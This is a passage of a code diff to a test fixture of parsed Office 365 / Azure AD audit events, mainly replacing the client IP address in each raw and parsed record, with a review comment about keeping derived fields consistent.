"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -7954,9 +7954,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { 
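Review bot: Only the two literal address fields, `"ActorIpAddress"` and `"ClientIP"`, change in this hunk; if the ingest pipeline derives any further field from that address (geo or AS enrichment, for instance), the expected value for it must move in step, and no such field is visible here. That is a non-issue if this expected-output file was regenerated by the pipeline test tooling rather than search-and-replaced, so it is worth confirming the fixture still matches a fresh run. The same applies to the parsed-field hunks at `@@ -8220`, `@@ -8486` and `@@ -8753`, and the matching `event.original` hunks before each of them are consistent with the new value `67.43.156.15` in both the raw event and the parsed fields. Swapping the previous real-world routable address for one from the allowed test range is the right call for committed fixtures, since a real address in test data can be misread as an indicator when the corpus is reused for detection testing.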
@@ -8190,7 +8190,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -8220,9 +8220,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:05", "ExtendedProperties": [ { 
@@ -8456,7 +8456,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"addi
tionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] 
=\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
